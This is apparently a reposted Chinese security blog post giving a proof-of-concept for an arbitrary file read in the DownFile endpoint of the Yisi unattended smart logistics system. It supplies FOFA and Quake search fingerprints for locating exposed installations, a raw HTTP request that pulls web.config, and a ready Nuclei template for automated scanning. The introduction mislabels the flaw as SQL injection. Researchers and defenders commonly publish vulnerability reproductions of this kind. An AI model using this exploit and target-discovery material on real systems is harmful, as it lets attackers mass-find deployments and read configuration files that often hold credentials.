易思智能物流无人值守系统DownFile任意文件读取 PoC

2024年11月10日16:02:44评论22 views字数 1043阅读3分28秒阅读模式

易思无人值守智能物流系统

易思无人值守智能物流系统‌是一款集成了人工智能、机器人技术和物联网技术的创新产品。它能够自主完成货物存储、检索、分拣、装载以及配送等物流作业，帮助企业实现无人值守的智能物流运营，提高效率、降低成本，为现代物流行业带来新的发展机遇。该系统旨在为流程生产企业提供原料采购、产成品销售及厂内物流的统一管控智能信息化平台，通过全企业产供销业务的集成管理，实现无人值守计量、降本增效、机器替代人工，优化物流资源管控体系。该系统某接口存在SQL注入漏洞

漏洞信息

混子Hacker

资产测绘

fofa: body="/Content/styles/eframe-ui.css"Quake：body:"/Content/styles/eframe-ui.css"

易思智能物流无人值守系统DownFile任意文件读取 PoC

混子Hacker

漏洞复现

GET /PublicInfoManage/Upload/DownFile?filePath=web.config HTTP/1.0Host: hostnameUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36Content-Type: application/x-www-form-urlencodedConnection: close

易思智能物流无人值守系统DownFile任意文件读取 PoC

混子Hacker

Nuclei Poc

id: eosine-DownFile-file-readinfo:  name: eosine File Read  author: Thomas  metadata:    fofa-query: 'body="/Content/styles/eframe-ui.css"'  tags: eosinerequests:  - method: GET    path:      - "{{BaseURL}}/PublicInfoManage/Upload/DownFile?filePath=web.config"    matchers-condition: and    matchers:      - type: word        words:          - "<configuration>"      - type: status        status:          - 200

<<< END >>>

原创文章｜转载请附上原文出处链接

更多漏洞｜关注作者查看

作者｜混子Hacker

原文始发于微信公众号（混子Hacker）：【漏洞复现】易思智能物流无人值守系统DownFile任意文件读取

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

易思智能物流无人值守系统DownFile任意文件读取 PoC

Argo Events权限管理不当漏洞

Oracle E-Business Suite远程代码执行漏洞(CVE-2025-30727)

Apache Roller 漏洞让攻击者获得未经授权的访问

Oracle E-Business Suite远程代码执行漏洞（CVE-2025-30727）

Apache Roller 未经授权的访问漏洞

Gladinet漏洞CVE-2025-30406遭在野利用

安美酒店管理系统/get_user_enrollment.php接口 sql注入漏洞

Microsoft Edge信息泄露漏洞(CVE-2025-29834)

【已复现】Gladinet CentreStack & Triofox 远程RCE漏洞（CVE-2025-30406）

【成功复现】Palo Alto Networks PAN-OS 身份验证绕过漏洞(CVE-2025-0108)

发表评论

在线咨询

微信